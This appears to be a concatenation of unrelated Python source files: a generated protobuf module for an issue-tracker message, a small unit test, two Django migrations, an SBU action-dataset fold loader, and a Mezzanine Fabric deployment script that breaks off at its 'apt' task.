\x03(\x0b\x32\x19.topboard.Issue.IssueFrom\x12\x1a\n\x06tester\x18\x0b \x03(\x0b\x32\n.cmdb.User\x12\x0c\n\x04name\x18\x0c \x01(\t\x12\x12\n\ninstanceId\x18\r \x01(\t\x12\x0f\n\x07\x63reator\x18\x0e \x01(\t\x12\r\n\x05\x63time\x18\x0f \x01(\t\x12\r\n\x05title\x18\x10 \x01(\t\x12\x13\n\x0b\x64\x65scription\x18\x11 \x01(\t\x12\x10\n\x08priority\x18\x12 \x01(\t\x12\x0c\n\x04type\x18\x13 \x01(\t\x12\x0c\n\x04step\x18\x14 \x01(\t\x12$\n\x05links\x18\x15 \x03(\x0b\x32\x15.topboard.Issue.Links\x12\x12\n\nstoryPoint\x18\x16 \x01(\t\x12\x12\n\nresolution\x18\x17 \x01(\t\x12\x0e\n\x06status\x18\x18 \x01(\t\x12&\n\x06images\x18\x19 \x03(\x0b\x32\x16.topboard.Issue.Images\x12\x0f\n\x07\x62ugType\x18\x1a \x01(\t\x12\x16\n\x0eresponsibility\x18\x1b \x01(\t\x1a-\n\tIssueFrom\x12\x0c\n\x04name\x18\x01 \x01(\t\x12\x12\n\ninstanceId\x18\x02 \x01(\t\x1a#\n\x05Links\x12\r\n\x05title\x18\x01 \x01(\t\x12\x0b\n\x03url\x18\x02 \x01(\t\x1a#\n\x06Images\x12\x0c\n\x04name\x18\x01 \x01(\t\x12\x0b\n\x03url\x18\x02 \x01(\tBDZBgo.easyops.local/contracts/protorepo-models/easyops/model/topboardb\x06proto3')
,
dependencies=[topology__sdk_dot_model_dot_topboard_dot_product__pb2.DESCRIPTOR,topology__sdk_dot_model_dot_topboard_dot_sprint__pb2.DESCRIPTOR,topology__sdk_dot_model_dot_cmdb_dot_user__pb2.DESCRIPTOR,topology__sdk_dot_model_dot_topboard_dot_attachment__pb2.DESCRIPTOR,topology__sdk_dot_model_dot_topboard_dot_comment__pb2.DESCRIPTOR,])
_ISSUE_ISSUEFROM = _descriptor.Descriptor(
name='IssueFrom',
full_name='topboard.Issue.IssueFrom',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='name', full_name='topboard.Issue.IssueFrom.name', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='instanceId', full_name='topboard.Issue.IssueFrom.instanceId', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=953,
serialized_end=998,
)
_ISSUE_LINKS = _descriptor.Descriptor(
name='Links',
full_name='topboard.Issue.Links',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='title', full_name='topboard.Issue.Links.title', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='url', full_name='topboard.Issue.Links.url', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=1000,
serialized_end=1035,
)
_ISSUE_IMAGES = _descriptor.Descriptor(
name='Images',
full_name='topboard.Issue.Images',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='name', full_name='topboard.Issue.Images.name', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='url', full_name='topboard.Issue.Images.url', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=1037,
serialized_end=1072,
)
_ISSUE = _descriptor.Descriptor(
name='Issue',
full_name='topboard.Issue',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='parent', full_name='topboard.Issue.parent', index=0,
number=1, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='subtasks', full_name='topboard.Issue.subtasks', index=1,
number=2, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='product', full_name='topboard.Issue.product', index=2,
number=3, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='sprint', full_name='topboard.Issue.sprint', index=3,
number=4, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='subscribers', full_name='topboard.Issue.subscribers', index=4,
number=5, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='assignee', full_name='topboard.Issue.assignee', index=5,
number=6, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='reporter', full_name='topboard.Issue.reporter', index=6,
number=7, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='attachments', full_name='topboard.Issue.attachments', index=7,
number=8, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='comments', full_name='topboard.Issue.comments', index=8,
number=9, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='issueFrom', full_name='topboard.Issue.issueFrom', index=9,
number=10, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='tester', full_name='topboard.Issue.tester', index=10,
number=11, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='name', full_name='topboard.Issue.name', index=11,
number=12, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='instanceId', full_name='topboard.Issue.instanceId', index=12,
number=13, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='creator', full_name='topboard.Issue.creator', index=13,
number=14, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='ctime', full_name='topboard.Issue.ctime', index=14,
number=15, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='title', full_name='topboard.Issue.title', index=15,
number=16, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='description', full_name='topboard.Issue.description', index=16,
number=17, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='priority', full_name='topboard.Issue.priority', index=17,
number=18, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='type', full_name='topboard.Issue.type', index=18,
number=19, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='step', full_name='topboard.Issue.step', index=19,
number=20, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='links', full_name='topboard.Issue.links', index=20,
number=21, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='storyPoint', full_name='topboard.Issue.storyPoint', index=21,
number=22, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='resolution', full_name='topboard.Issue.resolution', index=22,
number=23, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='status', full_name='topboard.Issue.status', index=23,
number=24, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='images', full_name='topboard.Issue.images', index=24,
number=25, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='bugType', full_name='topboard.Issue.bugType', index=25,
number=26, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='responsibility', full_name='topboard.Issue.responsibility', index=26,
number=27, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[_ISSUE_ISSUEFROM, _ISSUE_LINKS, _ISSUE_IMAGES, ],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=236,
serialized_end=1072,
)
_ISSUE_ISSUEFROM.containing_type = _ISSUE
_ISSUE_LINKS.containing_type = _ISSUE
_ISSUE_IMAGES.containing_type = _ISSUE
_ISSUE.fields_by_name['parent'].message_type = _ISSUE
_ISSUE.fields_by_name['subtasks'].message_type = _ISSUE
_ISSUE.fields_by_name['product'].message_type = topology__sdk_dot_model_dot_topboard_dot_product__pb2._PRODUCT
_ISSUE.fields_by_name['sprint'].message_type = topology__sdk_dot_model_dot_topboard_dot_sprint__pb2._SPRINT
_ISSUE.fields_by_name['subscribers'].message_type = topology__sdk_dot_model_dot_cmdb_dot_user__pb2._USER
_ISSUE.fields_by_name['assignee'].message_type = topology__sdk_dot_model_dot_cmdb_dot_user__pb2._USER
_ISSUE.fields_by_name['reporter'].message_type = topology__sdk_dot_model_dot_cmdb_dot_user__pb2._USER
_ISSUE.fields_by_name['attachments'].message_type = topology__sdk_dot_model_dot_topboard_dot_attachment__pb2._ATTACHMENT
_ISSUE.fields_by_name['comments'].message_type = topology__sdk_dot_model_dot_topboard_dot_comment__pb2._COMMENT
_ISSUE.fields_by_name['issueFrom'].message_type = _ISSUE_ISSUEFROM
_ISSUE.fields_by_name['tester'].message_type = topology__sdk_dot_model_dot_cmdb_dot_user__pb2._USER
_ISSUE.fields_by_name['links'].message_type = _ISSUE_LINKS
_ISSUE.fields_by_name['images'].message_type = _ISSUE_IMAGES
DESCRIPTOR.message_types_by_name['Issue'] = _ISSUE
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
Issue = _reflection.GeneratedProtocolMessageType('Issue', (_message.Message,), {
'IssueFrom' : _reflection.GeneratedProtocolMessageType('IssueFrom', (_message.Message,), {
'DESCRIPTOR' : _ISSUE_ISSUEFROM,
'__module__' : 'issue_pb2'
# @@protoc_insertion_point(class_scope:topboard.Issue.IssueFrom)
})
,
'Links' : _reflection.GeneratedProtocolMessageType('Links', (_message.Message,), {
'DESCRIPTOR' : _ISSUE_LINKS,
'__module__' : 'issue_pb2'
# @@protoc_insertion_point(class_scope:topboard.Issue.Links)
})
,
'Images' : _reflection.GeneratedProtocolMessageType('Images', (_message.Message,), {
'DESCRIPTOR' : _ISSUE_IMAGES,
'__module__' : 'issue_pb2'
# @@protoc_insertion_point(class_scope:topboard.Issue.Images)
})
,
'DESCRIPTOR' : _ISSUE,
'__module__' : 'issue_pb2'
# @@protoc_insertion_point(class_scope:topboard.Issue)
})
_sym_db.RegisterMessage(Issue)
_sym_db.RegisterMessage(Issue.IssueFrom)
_sym_db.RegisterMessage(Issue.Links)
_sym_db.RegisterMessage(Issue.Images)
DESCRIPTOR._options = None
# @@protoc_insertion_point(module_scope)
|
py | b410373dab98bbd95e3ed6a4f02c2fbe215971bb | # Copyright (c) 2016 Rackspace, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import mock
from poppy.provider.cloudfront import certificates
from tests.unit import base
class TestCertificates(base.TestCase):
def setUp(self):
super(TestCertificates, self).setUp()
self.driver = mock.Mock()
self.driver.provider_name = 'Cloudfront'
self.controller = certificates.CertificateController(self.driver)
def test_create_certificate(self):
self.assertEqual(
NotImplemented, self.controller.create_certificate({}))
|
py | b41038343d70854d1f257949e3fd840f1b075516 | # Generated by Django 3.1.2 on 2020-10-06 18:29
import django.core.validators
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
('auth', '0012_alter_user_first_name_max_length'),
]
operations = [
migrations.CreateModel(
name='User',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('password', models.CharField(max_length=128, verbose_name='password')),
('last_login', models.DateTimeField(blank=True, null=True, verbose_name='last login')),
('is_superuser', models.BooleanField(default=False, help_text='Designates that this user has all permissions without explicitly assigning them.', verbose_name='superuser status')),
('username', models.CharField(db_index=True, max_length=255, unique=True)),
('email', models.EmailField(max_length=254, unique=True, validators=[django.core.validators.EmailValidator()])),
('is_staff', models.BooleanField(default=False)),
('is_active', models.BooleanField(default=True)),
('groups', models.ManyToManyField(blank=True, help_text='The groups this user belongs to. A user will get all permissions granted to each of their groups.', related_name='user_set', related_query_name='user', to='auth.Group', verbose_name='groups')),
('user_permissions', models.ManyToManyField(blank=True, help_text='Specific permissions for this user.', related_name='user_set', related_query_name='user', to='auth.Permission', verbose_name='user permissions')),
],
options={
'abstract': False,
},
),
]
|
py | b41038df6cdf546101513a1c40383ca2c5ae9226 | # Generated by Django 3.1 on 2020-08-23 15:53
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Ingredients',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(blank=True, default='', max_length=200)),
('description', models.CharField(blank=True, default='', max_length=200)),
('category', models.CharField(blank=True, default='', max_length=200)),
('calorie_density', models.CharField(blank=True, default='', max_length=200)),
],
),
migrations.CreateModel(
name='Supplies',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('price', models.CharField(blank=True, default='', max_length=200)),
('servings_per_unit', models.IntegerField(blank=True)),
('expiration_period', models.IntegerField(blank=True)),
('ingredient', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.RESTRICT, to='rms_core.ingredients')),
],
),
migrations.CreateModel(
name='Recipes',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('add_date', models.DateTimeField(auto_now_add=True, null=True, verbose_name='date added')),
('instructions', models.CharField(blank=True, default='', max_length=200)),
('serves', models.IntegerField()),
('prep_time', models.IntegerField()),
('calories', models.IntegerField()),
('seasonality', models.CharField(blank=True, default='', max_length=200)),
('rating', models.IntegerField()),
('ingredients', models.ManyToManyField(to='rms_core.Ingredients')),
],
),
migrations.CreateModel(
name='RecipeInstances',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('made_date', models.DateTimeField(auto_now_add=True, null=True, verbose_name='date made')),
('comments', models.CharField(blank=True, default='', max_length=200)),
('changes', models.CharField(blank=True, default='todo', max_length=200)),
('rating', models.IntegerField()),
('recipe', models.ForeignKey(on_delete=django.db.models.deletion.RESTRICT, to='rms_core.recipes')),
],
),
migrations.CreateModel(
name='Pantry',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('servings_remaining', models.IntegerField(blank=True)),
('expiration_date', models.DateTimeField(auto_now_add=True, null=True, verbose_name='date expires')),
('supply', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.RESTRICT, to='rms_core.supplies')),
],
),
]
|
py | b41039d3747419a57bfb38036480d7f25f4af4df | import pandas as pd
import numpy as np
import glob
from misc import data_io
DATA_DIR = 'data/sbu/'
""" Folder structure
<set>/
<action_id>/
001/
[002] # not always
[003] # not always
depth_...
rgb_...
skeleton_pos.txt
Ex: DATA_DIR + '/s01s02/02/001/skeleton_pos.txt'
"""
SETS = ['s01s02','s01s03','s01s07','s02s01','s02s03','s02s06','s02s07','s03s02',
's03s04','s03s05','s03s06','s04s02','s04s03','s04s06','s05s02','s05s03',
's06s02','s06s03','s06s04','s07s01','s07s03']
FOLDS = [
[ 1, 9, 15, 19],
[ 5, 7, 10, 16],
[ 2, 3, 20, 21],
[ 4, 6, 8, 11],
[12, 13, 14, 17, 18]]
ACTIONS = ['Approaching','Departing','Kicking','Punching','Pushing','Hugging',
'ShakingHands','Exchanging']
def get_ground_truth(data_dir=DATA_DIR):
setname_lst, fold_lst, seq_lst, action_lst, path_lst = [], [], [], [], []
for set_id, set_name in enumerate(SETS):
for action_id in range(len(ACTIONS)):
search_exp = '{}/{}/{:02}/*'.format(data_dir, set_name, action_id+1)
paths = glob.glob(search_exp)
paths.sort()
for path in paths:
seq = path.split('/')[-1]
fold = np.argwhere([ set_id+1 in lst for lst in FOLDS ])[0,0]
setname_lst.append(set_name)
fold_lst.append(fold)
seq_lst.append(seq)
action_lst.append(action_id)
path_lst.append(path)
dataframe_dict = {'set_name': setname_lst,
'fold': fold_lst,
'seq': seq_lst,
'path': path_lst,
'action': action_lst}
ground_truth = pd.DataFrame(dataframe_dict)
return ground_truth
def get_folds():
folds = np.arange(len(FOLDS))
return folds
def get_train_gt(fold_num):
if fold_num < 0 or fold_num > 5:
raise ValueError("fold_num must be within 0 and 5, value entered: "+str(fold_num))
ground_truth = get_ground_truth()
gt_split = ground_truth[ground_truth.fold != fold_num]
return gt_split
def get_val_gt(fold_num):
if fold_num < 0 or fold_num > 5:
raise ValueError("fold_num must be within 0 and 5, value entered: "+str(fold_num))
ground_truth = get_ground_truth()
gt_split = ground_truth[ground_truth.fold == fold_num]
return gt_split
def get_train(fold_num, **kwargs):
if fold_num < 0 or fold_num > 5:
raise ValueError("fold_num must be within 0 and 5, value entered: "+str(fold_num))
ground_truth = get_ground_truth()
gt_split = ground_truth[ground_truth.fold != fold_num]
X, Y = data_io.get_data(gt_split, pose_style='SBU', **kwargs)
return X, Y
def get_val(fold_num, **kwargs):
if fold_num < 0 or fold_num > 5:
raise ValueError("fold_num must be within 0 and 5, value entered: "+str(fold_num))
ground_truth = get_ground_truth()
gt_split = ground_truth[ground_truth.fold == fold_num]
X, Y = data_io.get_data(gt_split, pose_style='SBU', **kwargs)
return X, Y
|
py | b41039efbc1ce3eb8ee63c14545cf97d3875a5a4 | from __future__ import print_function, unicode_literals
from future.builtins import open
import os
import re
import sys
from contextlib import contextmanager
from functools import wraps
from getpass import getpass, getuser
from glob import glob
from importlib import import_module
from posixpath import join
from mezzanine.utils.conf import real_project_name
from fabric.api import abort, env, cd, prefix, sudo as _sudo, run as _run, \
hide, task, local
from fabric.context_managers import settings as fab_settings
from fabric.contrib.console import confirm
from fabric.contrib.files import exists, upload_template
from fabric.contrib.project import rsync_project
from fabric.colors import yellow, green, blue, red
from fabric.decorators import hosts
################
# Config setup #
################
env.proj_app = real_project_name("mysite")
conf = {}
if sys.argv[0].split(os.sep)[-1] in ("fab", "fab-script.py"):
# Ensure we import settings from the current dir
try:
conf = import_module("%s.settings" % env.proj_app).FABRIC
try:
conf["HOSTS"][0]
except (KeyError, ValueError):
raise ImportError
except (ImportError, AttributeError):
print("Aborting, no hosts defined.")
exit()
env.db_pass = conf.get("DB_PASS", None)
env.admin_pass = conf.get("ADMIN_PASS", None)
env.user = conf.get("SSH_USER", getuser())
env.password = conf.get("SSH_PASS", None)
env.key_filename = conf.get("SSH_KEY_PATH", None)
env.hosts = conf.get("HOSTS", [""])
env.proj_name = conf.get("PROJECT_NAME", env.proj_app)
env.venv_home = conf.get("VIRTUALENV_HOME", "/home/%s/.virtualenvs" % env.user)
env.venv_path = join(env.venv_home, env.proj_name)
env.proj_path = "/home/%s/mezzanine/%s" % (env.user, env.proj_name)
env.manage = "%s/bin/python %s/manage.py" % (env.venv_path, env.proj_path)
env.domains = conf.get("DOMAINS", [conf.get("LIVE_HOSTNAME", env.hosts[0])])
env.domains_nginx = " ".join(env.domains)
env.domains_regex = "|".join(env.domains)
env.domains_python = ", ".join(["'%s'" % s for s in env.domains])
env.ssl_disabled = "#" if len(env.domains) > 1 else ""
env.vcs_tools = ["git", "hg"]
env.deploy_tool = conf.get("DEPLOY_TOOL", "rsync")
env.reqs_path = conf.get("REQUIREMENTS_PATH", None)
env.locale = conf.get("LOCALE", "en_US.UTF-8")
env.num_workers = conf.get("NUM_WORKERS",
"multiprocessing.cpu_count() * 2 + 1")
env.secret_key = conf.get("SECRET_KEY", "")
env.nevercache_key = conf.get("NEVERCACHE_KEY", "")
# Remote git repos need to be "bare" and reside separated from the project
if env.deploy_tool == "git":
env.repo_path = "/home/%s/git/%s.git" % (env.user, env.proj_name)
else:
env.repo_path = env.proj_path
##################
# Template setup #
##################
# Each template gets uploaded at deploy time, only if their
# contents has changed, in which case, the reload command is
# also run.
templates = {
"nginx": {
"local_path": "deploy/nginx.conf.template",
"remote_path": "/etc/nginx/sites-enabled/%(proj_name)s.conf",
"reload_command": "service nginx restart",
},
"supervisor": {
"local_path": "deploy/supervisor.conf.template",
"remote_path": "/etc/supervisor/conf.d/%(proj_name)s.conf",
"reload_command": "supervisorctl update gunicorn_%(proj_name)s",
},
"cron": {
"local_path": "deploy/crontab.template",
"remote_path": "/etc/cron.d/%(proj_name)s",
"owner": "root",
"mode": "600",
},
"gunicorn": {
"local_path": "deploy/gunicorn.conf.py.template",
"remote_path": "%(proj_path)s/gunicorn.conf.py",
},
"settings": {
"local_path": "deploy/local_settings.py.template",
"remote_path": "%(proj_path)s/%(proj_app)s/local_settings.py",
},
}
######################################
# Context for virtualenv and project #
######################################
@contextmanager
def virtualenv():
"""
Runs commands within the project's virtualenv.
"""
with cd(env.venv_path):
with prefix("source %s/bin/activate" % env.venv_path):
yield
@contextmanager
def project():
"""
Runs commands within the project's directory.
"""
with virtualenv():
with cd(env.proj_path):
yield
@contextmanager
def update_changed_requirements():
"""
Checks for changes in the requirements file across an update,
and gets new requirements if changes have occurred.
"""
reqs_path = join(env.proj_path, env.reqs_path)
get_reqs = lambda: run("cat %s" % reqs_path, show=False)
old_reqs = get_reqs() if env.reqs_path else ""
yield
if old_reqs:
new_reqs = get_reqs()
if old_reqs == new_reqs:
# Unpinned requirements should always be checked.
for req in new_reqs.split("\n"):
if req.startswith("-e"):
if "@" not in req:
# Editable requirement without pinned commit.
break
elif req.strip() and not req.startswith("#"):
if not set(">=<") & set(req):
# PyPI requirement without version.
break
else:
# All requirements are pinned.
return
pip("-r %s/%s" % (env.proj_path, env.reqs_path))
###########################################
# Utils and wrappers for various commands #
###########################################
def _print(output):
print()
print(output)
print()
def print_command(command):
_print(blue("$ ", bold=True) +
yellow(command, bold=True) +
red(" ->", bold=True))
@task
def run(command, show=True, *args, **kwargs):
"""
Runs a shell comand on the remote server.
"""
if show:
print_command(command)
with hide("running"):
return _run(command, *args, **kwargs)
@task
def sudo(command, show=True, *args, **kwargs):
"""
Runs a command as sudo on the remote server.
"""
if show:
print_command(command)
with hide("running"):
return _sudo(command, *args, **kwargs)
def log_call(func):
@wraps(func)
def logged(*args, **kawrgs):
header = "-" * len(func.__name__)
_print(green("\n".join([header, func.__name__, header]), bold=True))
return func(*args, **kawrgs)
return logged
def get_templates():
"""
Returns each of the templates with env vars injected.
"""
injected = {}
for name, data in templates.items():
injected[name] = dict([(k, v % env) for k, v in data.items()])
return injected
def upload_template_and_reload(name):
"""
Uploads a template only if it has changed, and if so, reload the
related service.
"""
template = get_templates()[name]
local_path = template["local_path"]
if not os.path.exists(local_path):
project_root = os.path.dirname(os.path.abspath(__file__))
local_path = os.path.join(project_root, local_path)
remote_path = template["remote_path"]
reload_command = template.get("reload_command")
owner = template.get("owner")
mode = template.get("mode")
remote_data = ""
if exists(remote_path):
with hide("stdout"):
remote_data = sudo("cat %s" % remote_path, show=False)
with open(local_path, "r") as f:
local_data = f.read()
# Escape all non-string-formatting-placeholder occurrences of '%':
local_data = re.sub(r"%(?!\(\w+\)s)", "%%", local_data)
if "%(db_pass)s" in local_data:
env.db_pass = db_pass()
local_data %= env
clean = lambda s: s.replace("\n", "").replace("\r", "").strip()
if clean(remote_data) == clean(local_data):
return
upload_template(local_path, remote_path, env, use_sudo=True, backup=False)
if owner:
sudo("chown %s %s" % (owner, remote_path))
if mode:
sudo("chmod %s %s" % (mode, remote_path))
if reload_command:
sudo(reload_command)
def rsync_upload():
"""
Uploads the project with rsync excluding some files and folders.
"""
excludes = ["*.pyc", "*.pyo", "*.db", ".DS_Store", ".coverage",
"local_settings.py", "/static", "/.git", "/.hg"]
local_dir = os.getcwd() + os.sep
return rsync_project(remote_dir=env.proj_path, local_dir=local_dir,
exclude=excludes)
def vcs_upload():
"""
Uploads the project with the selected VCS tool.
"""
if env.deploy_tool == "git":
remote_path = "ssh://%s@%s%s" % (env.user, env.host_string,
env.repo_path)
if not exists(env.repo_path):
run("mkdir -p %s" % env.repo_path)
with cd(env.repo_path):
run("git init --bare")
local("git push -f %s master" % remote_path)
with cd(env.repo_path):
run("GIT_WORK_TREE=%s git checkout -f master" % env.proj_path)
run("GIT_WORK_TREE=%s git reset --hard" % env.proj_path)
elif env.deploy_tool == "hg":
remote_path = "ssh://%s@%s/%s" % (env.user, env.host_string,
env.repo_path)
with cd(env.repo_path):
if not exists("%s/.hg" % env.repo_path):
run("hg init")
print(env.repo_path)
with fab_settings(warn_only=True):
push = local("hg push -f %s" % remote_path)
if push.return_code == 255:
abort()
run("hg update")
def db_pass():
"""
Prompts for the database password if unknown.
"""
if not env.db_pass:
env.db_pass = getpass("Enter the database password: ")
return env.db_pass
@task
def apt(packages):
